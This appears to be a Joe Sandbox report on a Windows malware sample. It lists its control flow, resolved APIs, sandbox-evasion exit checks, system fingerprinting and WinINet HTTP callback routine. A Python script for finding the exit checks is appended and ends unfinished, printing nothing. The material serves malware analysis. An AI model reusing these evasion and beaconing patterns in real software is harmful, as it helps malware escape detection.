26895->26897 26898 426ff5 26896->26898 26899 426fca GetProcAddress GetProcAddress 26896->26899 26897->26896 26900 427002 10 API calls 26898->26900 26901 4270ed 26898->26901 26899->26898 26900->26901 26902 427152 26901->26902 26903 4270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26901->26903 26904 42715b GetProcAddress 26902->26904 26905 42716e 26902->26905 26903->26902 26904->26905 26906 42051f 26905->26906 26907 427177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26905->26907 26908 401530 26906->26908 26907->26906 27217 401610 
26908->27217 26910 40153b 26911 401555 lstrcpy 26910->26911 26912 40155d 26910->26912 26911->26912 26913 401577 lstrcpy 26912->26913 26914 40157f 26912->26914 26913->26914 26915 401599 lstrcpy 26914->26915 26917 4015a1 26914->26917 26915->26917 26916 401605 26919 41f1b0 lstrlen 26916->26919 26917->26916 26918 4015fd lstrcpy 26917->26918 26918->26916 26920 41f1e4 26919->26920 26921 41f1f7 lstrlen 26920->26921 26922 41f1eb lstrcpy 26920->26922 26923 41f208 26921->26923 26922->26921 26924 41f21b lstrlen 26923->26924 26925 41f20f lstrcpy 26923->26925 26926 41f22c 26924->26926 26925->26924 26927 41f233 lstrcpy 26926->26927 26928 41f23f 26926->26928 26927->26928 26929 41f258 lstrcpy 26928->26929 26930 41f264 26928->26930 26929->26930 26931 41f286 lstrcpy 26930->26931 26932 41f292 26930->26932 26931->26932 26933 41f2ba lstrcpy 26932->26933 26934 41f2c6 26932->26934 26933->26934 26935 41f2ea lstrcpy 26934->26935 26986 41f300 26934->26986 26935->26986 26936 41f30c lstrlen 26936->26986 26937 41f4b9 lstrcpy 26937->26986 26938 41f3a1 lstrcpy 26938->26986 26939 41f3c5 lstrcpy 26939->26986 26940 41f4e8 lstrcpy 27000 41f4f0 26940->27000 26941 41f479 lstrcpy 26941->26986 26942 41f59c lstrcpy 26942->27000 26943 41f70f StrCmpCA 26948 41fe8e 26943->26948 26943->26986 26944 41f616 StrCmpCA 26944->26943 26944->27000 26945 41fa29 StrCmpCA 26957 41fe2b 26945->26957 26945->26986 26946 41f73e lstrlen 26946->26986 26947 41fd4d StrCmpCA 26951 41fd60 Sleep 26947->26951 26962 41fd75 26947->26962 26949 41fead lstrlen 26948->26949 26950 41fea5 lstrcpy 26948->26950 26955 41fec7 26949->26955 26950->26949 26951->26986 26952 41fa58 lstrlen 26952->26986 26953 41f64a lstrcpy 26953->27000 26954 401530 8 API calls 26954->27000 26960 41fee7 lstrlen 26955->26960 26965 41fedf lstrcpy 26955->26965 26956 41fe4a lstrlen 26964 41fe64 26956->26964 26957->26956 26958 41fe42 lstrcpy 26957->26958 26958->26956 26959 41f89e lstrcpy 26959->26986 26968 41ff01 26960->26968 26961 41fd94 lstrlen 26975 41fdae 26961->26975 
26962->26961 26966 41fd8c lstrcpy 26962->26966 26963 41f76f lstrcpy 26963->26986 26970 41fdce lstrlen 26964->26970 26973 41fe7c lstrcpy 26964->26973 26965->26960 26966->26961 26967 41fbb8 lstrcpy 26967->26986 26976 41ff21 26968->26976 26984 41ff19 lstrcpy 26968->26984 26969 41fa89 lstrcpy 26969->26986 26983 41fde8 26970->26983 26972 41f8cd lstrcpy 26972->27000 26973->26970 26974 41f791 lstrcpy 26974->26986 26975->26970 26979 41fdc6 lstrcpy 26975->26979 26985 401610 4 API calls 26976->26985 26977 41faab lstrcpy 26977->26986 26978 41f698 lstrcpy 26978->27000 26979->26970 26980 41ee90 28 API calls 26980->26986 26981 401530 8 API calls 26981->26986 26982 41fbe7 lstrcpy 26982->27000 26987 41fe08 26983->26987 26989 41fe00 lstrcpy 26983->26989 26984->26976 27003 41fe13 26985->27003 26986->26936 26986->26937 26986->26938 26986->26939 26986->26940 26986->26941 26986->26943 26986->26945 26986->26946 26986->26947 26986->26952 26986->26959 26986->26963 26986->26967 26986->26969 26986->26972 26986->26974 26986->26977 26986->26980 26986->26981 26986->26982 26991 41f7e2 lstrcpy 26986->26991 26994 41fafc lstrcpy 26986->26994 26986->27000 26990 401610 4 API calls 26987->26990 26988 41efb0 35 API calls 26988->27000 26989->26987 26990->27003 26991->26986 26992 41f924 lstrcpy 26992->27000 26993 41f99e StrCmpCA 26993->26945 26993->27000 26994->26986 26995 41fc3e lstrcpy 26995->27000 26996 41fcb8 StrCmpCA 26996->26947 26996->27000 26997 41f9cb lstrcpy 26997->27000 26998 41fce9 lstrcpy 26998->27000 26999 41ee90 28 API calls 26999->27000 27000->26942 27000->26944 27000->26945 27000->26947 27000->26953 27000->26954 27000->26978 27000->26986 27000->26988 27000->26992 27000->26993 27000->26995 27000->26996 27000->26997 27000->26998 27000->26999 27001 41fa19 lstrcpy 27000->27001 27002 41fd3a lstrcpy 27000->27002 27001->27000 27002->27000 27003->26027 27005 422785 27004->27005 27006 42278c GetVolumeInformationA 27004->27006 27005->27006 27007 4227ec GetProcessHeap RtlAllocateHeap 27006->27007 
27009 422822 27007->27009 27010 422826 wsprintfA 27007->27010 27227 4271e0 27009->27227 27010->27009 27014 404c70 27013->27014 27015 404c85 27014->27015 27016 404c7d lstrcpy 27014->27016 27231 404bc0 27015->27231 27016->27015 27018 404c90 27019 404ccc lstrcpy 27018->27019 27020 404cd8 27018->27020 27019->27020 27021 404cff lstrcpy 27020->27021 27022 404d0b 27020->27022 27021->27022 27023 404d2f lstrcpy 27022->27023 27024 404d3b 27022->27024 27023->27024 27025 404d6d lstrcpy 27024->27025 27026 404d79 27024->27026 27025->27026 27027 404da0 lstrcpy 27026->27027 27028 404dac InternetOpenA StrCmpCA 27026->27028 27027->27028 27029 404de0 27028->27029 27030 4054b8 InternetCloseHandle CryptStringToBinaryA 27029->27030 27235 423e70 27029->27235 27031 4054e8 LocalAlloc 27030->27031 27047 4055d8 27030->27047 27033 4054ff CryptStringToBinaryA 27031->27033 27031->27047 27034 405517 LocalFree 27033->27034 27035 405529 lstrlen 27033->27035 27034->27047 27036 40553d 27035->27036 27038 405563 lstrlen 27036->27038 27039 405557 lstrcpy 27036->27039 27037 404dfa 27040 404e23 lstrcpy lstrcat 27037->27040 27041 404e38 27037->27041 27043 40557d 27038->27043 27039->27038 27040->27041 27042 404e5a lstrcpy 27041->27042 27045 404e62 27041->27045 27042->27045 27044 40558f lstrcpy lstrcat 27043->27044 27048 4055a2 27043->27048 27044->27048 27046 404e71 lstrlen 27045->27046 27050 404e89 27046->27050 27047->26056 27049 4055d1 27048->27049 27051 4055c9 lstrcpy 27048->27051 27049->27047 27052 404e95 lstrcpy lstrcat 27050->27052 27053 404eac 27050->27053 27051->27049 27052->27053 27054 404ed5 27053->27054 27055 404ecd lstrcpy 27053->27055 27056 404edc lstrlen 27054->27056 27055->27054 27057 404ef2 27056->27057 27058 404efe lstrcpy lstrcat 27057->27058 27059 404f15 27057->27059 27058->27059 27060 404f36 lstrcpy 27059->27060 27061 404f3e 27059->27061 27060->27061 27062 404f65 lstrcpy lstrcat 27061->27062 27063 404f7b 27061->27063 27062->27063 27064 404fa4 27063->27064 27065 404f9c lstrcpy 
27063->27065 27066 404fab lstrlen 27064->27066 27065->27064 27067 404fc1 27066->27067 27068 404fcd lstrcpy lstrcat 27067->27068 27069 404fe4 27067->27069 27068->27069 27070 40500d 27069->27070 27071 405005 lstrcpy 27069->27071 27072 405014 lstrlen 27070->27072 27071->27070 27073 40502a 27072->27073 27074 405036 lstrcpy lstrcat 27073->27074 27075 40504d 27073->27075 27074->27075 27076 405079 27075->27076 27077 405071 lstrcpy 27075->27077 27078 405080 lstrlen 27076->27078 27077->27076 27079 40509b 27078->27079 27080 4050ac lstrcpy lstrcat 27079->27080 27081 4050bc 27079->27081 27080->27081 27082 4050da lstrcpy lstrcat 27081->27082 27083 4050ed 27081->27083 27082->27083 27084 40510b lstrcpy 27083->27084 27085 405113 27083->27085 27084->27085 27086 405121 InternetConnectA 27085->27086 27086->27030 27087 405150 HttpOpenRequestA 27086->27087 27088 4054b1 InternetCloseHandle 27087->27088 27089 40518b 27087->27089 27088->27030 27242 427310 lstrlen 27089->27242 27093 4051a4 27250 4272c0 27093->27250 27096 427280 lstrcpy 27097 4051c0 27096->27097 27098 427310 3 API calls 27097->27098 27099 4051d5 27098->27099 27100 427280 lstrcpy 27099->27100 27101 4051de 27100->27101 27102 427310 3 API calls 27101->27102 27103 4051f4 27102->27103 27104 427280 lstrcpy 27103->27104 27105 4051fd 27104->27105 27106 427310 3 API calls 27105->27106 27107 405213 27106->27107 27108 427280 lstrcpy 27107->27108 27109 40521c 27108->27109 27110 427310 3 API calls 27109->27110 27111 405231 27110->27111 27112 427280 lstrcpy 27111->27112 27113 40523a 27112->27113 27114 4272c0 2 API calls 27113->27114 27115 40524d 27114->27115 27116 427280 lstrcpy 27115->27116 27117 405256 27116->27117 27118 427310 3 API calls 27117->27118 27119 40526b 27118->27119 27120 427280 lstrcpy 27119->27120 27121 405274 27120->27121 27122 427310 3 API calls 27121->27122 27123 405289 27122->27123 27124 427280 lstrcpy 27123->27124 27125 405292 27124->27125 27126 4272c0 2 API calls 27125->27126 27127 4052a5 27126->27127 27128 427280 
lstrcpy 27127->27128 27129 4052ae 27128->27129 27130 427310 3 API calls 27129->27130 27131 4052c3 27130->27131 27132 427280 lstrcpy 27131->27132 27133 4052cc 27132->27133 27134 427310 3 API calls 27133->27134 27135 4052e2 27134->27135 27136 427280 lstrcpy 27135->27136 27137 4052eb 27136->27137 27138 427310 3 API calls 27137->27138 27139 405301 27138->27139 27140 427280 lstrcpy 27139->27140 27141 40530a 27140->27141 27142 427310 3 API calls 27141->27142 27143 40531f 27142->27143 27144 427280 lstrcpy 27143->27144 27145 405328 27144->27145 27146 4272c0 2 API calls 27145->27146 27147 40533b 27146->27147 27148 427280 lstrcpy 27147->27148 27149 405344 27148->27149 27150 405370 lstrcpy 27149->27150 27151 40537c 27149->27151 27150->27151 27152 4272c0 2 API calls 27151->27152 27153 40538a 27152->27153 27154 4272c0 2 API calls 27153->27154 27155 405397 27154->27155 27156 427280 lstrcpy 27155->27156 27157 4053a1 27156->27157 27158 4053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27157->27158 27159 40549c InternetCloseHandle 27158->27159 27163 4053f2 27158->27163 27161 4054ae 27159->27161 27160 4053fd lstrlen 27160->27163 27161->27088 27162 40542e lstrcpy lstrcat 27162->27163 27163->27159 27163->27160 27163->27162 27164 405473 27163->27164 27165 40546b lstrcpy 27163->27165 27166 40547a InternetReadFile 27164->27166 27165->27164 27166->27159 27166->27163 27168 418cc6 ExitProcess 27167->27168 27169 418ccd 27167->27169 27170 418ee2 27169->27170 27171 418d84 StrCmpCA 27169->27171 27172 418da4 StrCmpCA 27169->27172 27173 418d06 lstrlen 27169->27173 27174 418e88 lstrlen 27169->27174 27175 418e6f StrCmpCA 27169->27175 27176 418d30 lstrlen 27169->27176 27177 418e56 StrCmpCA 27169->27177 27178 418d5a lstrlen 27169->27178 27179 418dbd StrCmpCA 27169->27179 27180 418ddd StrCmpCA 27169->27180 27181 418dfd StrCmpCA 27169->27181 27182 418e1d StrCmpCA 27169->27182 27183 418e3d StrCmpCA 27169->27183 27184 418ebb lstrcpy 27169->27184 27170->26058 27171->27169 27172->27169 27173->27169 
27174->27169 27175->27169 27176->27169 27177->27169 27178->27169 27179->27169 27180->27169 27181->27169 27182->27169 27183->27169 27184->27169 27185->26064 27186->26066 27187->26072 27188->26074 27189->26080 27190->26082 27191->26088 27192->26092 27193->26098 27194->26100 27195->26104 27196->26118 27197->26122 27198->26121 27199->26117 27200->26121 27201->26137 27202->26123 27203->26127 27204->26128 27205->26134 27206->26139 27207->26141 27208->26148 27209->26154 27210->26176 27211->26179 27212->26178 27213->26174 27214->26178 27215->26188 27218 40161f 27217->27218 27219 40162b lstrcpy 27218->27219 27220 401633 27218->27220 27219->27220 27221 40164d lstrcpy 27220->27221 27222 401655 27220->27222 27221->27222 27223 40166f lstrcpy 27222->27223 27225 401677 27222->27225 27223->27225 27224 401699 27224->26910 27225->27224 27226 401691 lstrcpy 27225->27226 27226->27224 27228 4271e6 27227->27228 27229 422860 27228->27229 27230 4271fc lstrcpy 27228->27230 27229->26053 27230->27229 27232 404bd0 27231->27232 27232->27232 27233 404bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27232->27233 27234 404c41 27233->27234 27234->27018 27236 423e83 27235->27236 27237 423e9f lstrcpy 27236->27237 27238 423eab 27236->27238 27237->27238 27239 423ed5 GetSystemTime 27238->27239 27240 423ecd lstrcpy 27238->27240 27241 423ef3 27239->27241 27240->27239 27241->27037 27243 42732d 27242->27243 27244 40519b 27243->27244 27245 42733d lstrcpy lstrcat 27243->27245 27246 427280 27244->27246 27245->27244 27247 42728c 27246->27247 27248 4272b4 27247->27248 27249 4272ac lstrcpy 27247->27249 27248->27093 27249->27248 27252 4272dc 27250->27252 27251 4051b7 27251->27096 27252->27251 27253 4272ed lstrcpy lstrcat 27252->27253 27253->27251 27283 4231f0 GetSystemInfo wsprintfA 27259 414c77 295 API calls 27267 41e0f9 140 API calls 27298 416b79 138 API calls 27261 408c79 strlen malloc 27289 41f2f8 93 API calls 27299 401b64 162 API calls 27310 40bbf9 90 API calls 27268 422880 10 API calls 27269 
424480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27270 423480 6 API calls 27290 423280 7 API calls 27271 418c88 16 API calls 27300 40b309 98 API calls 27262 422c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27301 429711 9 API calls __setmbcp 27280 424e35 8 API calls 27272 412499 290 API calls 27311 40db99 672 API calls 27312 418615 47 API calls 27273 42749e malloc strlen ctype 27275 4230a0 GetSystemPowerStatus 27284 4229a0 GetCurrentProcess IsWow64Process 27302 414b29 303 API calls 27313 4123a9 298 API calls 27281 423130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27314 41abb2 120 API calls 27288 40f639 144 API calls 27291 4016b9 200 API calls 27306 40bf39 177 API calls
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00404C7F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404CD2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404D05
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404D35
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404D73
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00404DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 6c3c5d335efb11815440e1d7030d8ffe3761fab3276f760a29416e0f67d3dcd2
                          • Instruction ID: afea9254e350e2c83c5ca1416078c05f3deafe074f832828c9fbfb0ea130657c
                          • Opcode Fuzzy Hash: 6c3c5d335efb11815440e1d7030d8ffe3761fab3276f760a29416e0f67d3dcd2
                          • Instruction Fuzzy Hash: D3527C71A006169BDB21EBA5DC89A9F77B9AF44304F14502AF901B7291DB78EC41CFE8

                          Control-flow Graph
                          APIs
                          • GetProcAddress.KERNEL32(75550000,00FB0828), ref: 004263E9
                          • GetProcAddress.KERNEL32(75550000,00FB0798), ref: 00426402
                          • GetProcAddress.KERNEL32(75550000,00FB06F0), ref: 0042641A
                          • GetProcAddress.KERNEL32(75550000,00FB0720), ref: 00426432
                          • GetProcAddress.KERNEL32(75550000,00FB89A0), ref: 0042644B
                          • GetProcAddress.KERNEL32(75550000,00FA64E0), ref: 00426463
                          • GetProcAddress.KERNEL32(75550000,00FA6420), ref: 0042647B
                          • GetProcAddress.KERNEL32(75550000,00FB0750), ref: 00426494
                          • GetProcAddress.KERNEL32(75550000,00FB0570), ref: 004264AC
                          • GetProcAddress.KERNEL32(75550000,00FB0780), ref: 004264C4
                          • GetProcAddress.KERNEL32(75550000,00FB0840), ref: 004264DD
                          • GetProcAddress.KERNEL32(75550000,00FA62E0), ref: 004264F5
                          • GetProcAddress.KERNEL32(75550000,00FB0588), ref: 0042650D
                          • GetProcAddress.KERNEL32(75550000,00FB05A0), ref: 00426526
                          • GetProcAddress.KERNEL32(75550000,00FA65C0), ref: 0042653E
                          • GetProcAddress.KERNEL32(75550000,00FB0660), ref: 00426556
                          • GetProcAddress.KERNEL32(75550000,00FB0870), ref: 0042656F
                          • GetProcAddress.KERNEL32(75550000,00FA6600), ref: 00426587
                          • GetProcAddress.KERNEL32(75550000,00FB08E8), ref: 0042659F
                          • GetProcAddress.KERNEL32(75550000,00FA64C0), ref: 004265B8
                          • LoadLibraryA.KERNEL32(00FB08A0,?,?,?,00421C03), ref: 004265C9
                          • LoadLibraryA.KERNEL32(00FB0888,?,?,?,00421C03), ref: 004265DB
                          • LoadLibraryA.KERNEL32(00FB0918,?,?,?,00421C03), ref: 004265ED
                          • LoadLibraryA.KERNEL32(00FB08B8,?,?,?,00421C03), ref: 004265FE
                          • LoadLibraryA.KERNEL32(00FB0900,?,?,?,00421C03), ref: 00426610
                          • GetProcAddress.KERNEL32(75670000,00FB08D0), ref: 0042662D
                          • GetProcAddress.KERNEL32(75750000,00FB0858), ref: 00426649
                          • GetProcAddress.KERNEL32(75750000,00FB8CE8), ref: 00426661
                          • GetProcAddress.KERNEL32(76BE0000,00FB8D30), ref: 0042667D
                          • GetProcAddress.KERNEL32(759D0000,00FA6620), ref: 00426699
                          • GetProcAddress.KERNEL32(773F0000,00FB8900), ref: 004266B5
                          • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 004266CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 004266C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 08423d41d42870b35824142912b907ad99356ee077fbccda2de61b0a00986185
                          • Instruction ID: 56f15a9ebe07009b104d3bca99d0accdf766ba62d45a378873afb81fcff78c7b
                          • Opcode Fuzzy Hash: 08423d41d42870b35824142912b907ad99356ee077fbccda2de61b0a00986185
                          • Instruction Fuzzy Hash: 0FA16EB9A117009FD758DF65EE88A6637BBF789744300A51DF94683360DBB4A900DFB0

                          Control-flow Graph
                          APIs
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0828), ref: 004263E9
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0798), ref: 00426402
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB06F0), ref: 0042641A
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0720), ref: 00426432
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB89A0), ref: 0042644B
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FA64E0), ref: 00426463
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FA6420), ref: 0042647B
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0750), ref: 00426494
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0570), ref: 004264AC
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0780), ref: 004264C4
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0840), ref: 004264DD
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FA62E0), ref: 004264F5
                            • Part of subcall function 00426390: GetProcAddress.KERNEL32(75550000,00FB0588), ref: 0042650D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00421C2F
                          • ExitProcess.KERNEL32 ref: 00421C67
                          • GetSystemInfo.KERNEL32(?), ref: 00421C71
                          • ExitProcess.KERNEL32 ref: 00421C7F
                            • Part of subcall function 00401030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00401046
                            • Part of subcall function 00401030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0040104D
                            • Part of subcall function 00401030: ExitProcess.KERNEL32 ref: 00401058
                            • Part of subcall function 004010C0: GlobalMemoryStatusEx.KERNEL32 ref: 004010EA
                            • Part of subcall function 004010C0: ExitProcess.KERNEL32 ref: 00401114
                          • GetUserDefaultLangID.KERNEL32 ref: 00421C8F
                          • ExitProcess.KERNEL32 ref: 00421CB2
                          • ExitProcess.KERNEL32 ref: 00421CE1
                          • lstrlen.KERNEL32(00FB89B0), ref: 00421CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00421D15
                          • lstrcat.KERNEL32(00000000,00FB89B0), ref: 00421D1D
                          • lstrlen.KERNEL32(00434B98), ref: 00421D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421D48
                          • lstrcat.KERNEL32(00000000,00434B98), ref: 00421D54
                          • lstrlen.KERNEL32(00000000), ref: 00421D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421D94
                          • lstrlen.KERNEL32(00434B98), ref: 00421D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421DBC
                          • lstrcat.KERNEL32(00000000,00434B98), ref: 00421DC8
                          • lstrlen.KERNEL32(00000000), ref: 00421DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: e2ba703a6ad5ed510cfddc1de3b762142021dd56ead29c6c8253a2dd7aec8743
                          • Instruction ID: 03021059dba16aa87f5c98c3e9dfc5b5bc8650af3fc5268864bb81aad2973203
                          • Opcode Fuzzy Hash: e2ba703a6ad5ed510cfddc1de3b762142021dd56ead29c6c8253a2dd7aec8743
                          • Instruction Fuzzy Hash: 1771C731700325ABD720ABB1ED4DB6F767AAF51745F44102AF506A72B1DFB89801CFA8
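The control_flow_graph line above encodes sub_421bf0's pre-flight checks as plain text: a block id, its address range, the calls the block makes, and the edges between blocks. As an added example that is not part of the Joe Sandbox report or of the sample, the following Python parses that notation and, for every block that calls ExitProcess, reports which block branched into it and the nearest API or subroutine calls on the way there, which is the quickest way to read the evasion chain the report flags (GetSystemInfo, the sub_401030 and sub_4010c0 subcalls, GetUserDefaultLangID) off a graph of this size. The graph text is copied from the report; nothing beyond the notation itself is assumed.

```python
"""Added example (not part of the Joe Sandbox report): parse the one-line
control_flow_graph notation used above and list, for every basic block that calls
ExitProcess, the block that branches into it and the nearest API or subroutine calls
on that path. The input is the graph of sub_421bf0 copied from the report."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

EDGE = re.compile(r"^(\d+)->(\d+)$")                    # "2151->2156"
ADDR = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")    # "421c65-421c67" or a lone "421c0d"

SUB_421BF0_CFG = """control_flow_graph 2141 421bf0-421c0b call 402a90 call 426390 2146 421c1a-421c27 call 402930 2141->2146 2147 421c0d 2141->2147 2151 421c35-421c63 2146->2151
2152 421c29-421c2f lstrcpy 2146->2152 2148 421c10-421c18 2147->2148 2148->2146 2148->2148 2156 421c65-421c67 ExitProcess 2151->2156 2157 421c6d-421c7b GetSystemInfo
2151->2157 2152->2151 2158 421c85-421ca0 call 401030 call 4010c0 GetUserDefaultLangID 2157->2158 2159 421c7d-421c7f ExitProcess 2157->2159 2164 421ca2-421ca9 2158->2164
2165 421cb8-421cca call 422ad0 call 423e10 2158->2165 2164->2165 2166 421cb0-421cb2 ExitProcess 2164->2166 2171 421ce7-421d06 lstrlen call 402930 2165->2171
2172 421ccc-421cde call 422a40 call 423e10 2165->2172 2178 421d23-421d40 lstrlen call 402930 2171->2178 2179 421d08-421d0d 2171->2179 2172->2171
2183 421ce0-421ce1 ExitProcess 2172->2183 2186 421d42-421d44 2178->2186 2187 421d5a-421d7b call 422ad0 lstrlen call 402930 2178->2187 2179->2178
2181 421d0f-421d11 2179->2181 2181->2178 2184 421d13-421d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2189 421d46-421d54 lstrcpy lstrcat 2186->2189
2193 421d9a-421db4 lstrlen call 402930 2187->2193 2194 421d7d-421d7f 2187->2194 2189->2187 2199 421db6-421db8 2193->2199
2200 421dce-421deb call 422a40 lstrlen call 402930 2193->2200 2194->2193 2195 421d81-421d85 2194->2195 2195->2193 2197 421d87-421d94 lstrcpy lstrcat 2195->2197
2197->2193 2199->2200 2201 421dba-421dc8 lstrcpy lstrcat 2199->2201 2206 421e0a-421e0f 2200->2206 2207 421ded-421def 2200->2207 2201->2200 2209 421e11 call 402a20
2206->2209 2210 421e16-421e22 call 402930 2206->2210 2207->2206 2208 421df1-421df5 2207->2208 2208->2206 2211 421df7-421e04 lstrcpy lstrcat 2208->2211 2209->2210
2215 421e30-421e66 call 402a20 * 5 OpenEventA 2210->2215 2216 421e24-421e26 2210->2216 2211->2206 2228 421e68-421e8a CloseHandle Sleep OpenEventA 2215->2228
2229 421e8c-421ea0 CreateEventA call 421b20 call 41ffd0 2215->2229 2216->2215 2217 421e28-421e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229
2233 421ea5-421eae CloseHandle ExitProcess 2229->2233"""


@dataclass
class Block:
    start: int
    end: int
    labels: list = field(default_factory=list)  # "GetSystemInfo", "call 402930", "call 402a20 * 5"


@dataclass
class Cfg:
    blocks: dict = field(default_factory=dict)                      # node id -> Block
    preds: dict = field(default_factory=lambda: defaultdict(list))  # node id -> predecessor ids


def parse_cfg(text: str) -> Cfg:
    """'<id> <start>[-<end>]' opens a block, 'call <addr>' and bare API names label the
    current block, '* <n>' is a repeat count for the previous label, '<a>-><b>' is an edge."""
    toks = text.split()
    g, cur, i = Cfg(), None, 1 if toks[0] == "control_flow_graph" else 0
    while i < len(toks):
        t = toks[i]
        if m := EDGE.match(t):
            g.preds[int(m[2])].append(int(m[1])); i += 1
        elif t == "call":
            cur.labels.append(f"call {toks[i + 1]}"); i += 2
        elif t == "*":
            cur.labels[-1] += f" * {toks[i + 1]}"; i += 2
        elif t.isdigit():                       # only node ids are bare decimal numbers here
            a = ADDR.match(toks[i + 1])
            cur = g.blocks[int(t)] = Block(int(a[1], 16), int(a[2] or a[1], 16)); i += 2
        else:
            cur.labels.append(t); i += 1
    return g


@dataclass
class Gate:
    exit_at: int   # start of the block that calls ExitProcess
    via: int       # start of the block that branches into it
    direct: bool   # True when `via` itself makes the calls in `checks`
    checks: list   # labels of `via`, or of the nearest labelled ancestors when `via` has none


def exit_gates(g: Cfg, api: str = "ExitProcess") -> list:
    gates = []
    for nid, b in g.blocks.items():
        if api not in b.labels:
            continue
        for p in g.preds[nid]:
            checks, seen, queue = [], set(), [p]
            while queue:                        # breadth-first walk back to labelled blocks
                q = queue.pop(0)
                if q in seen:
                    continue
                seen.add(q)
                if g.blocks[q].labels:
                    checks += [x for x in g.blocks[q].labels if x not in checks]
                else:
                    queue += g.preds[q]
            gates.append(Gate(b.start, g.blocks[p].start, bool(g.blocks[p].labels), checks))
    return sorted(gates, key=lambda x: x.exit_at)


if __name__ == "__main__":
    for gt in exit_gates(parse_cfg(SUB_421BF0_CFG)):
        how = "calls" if gt.direct else "no API in block, nearest earlier calls"
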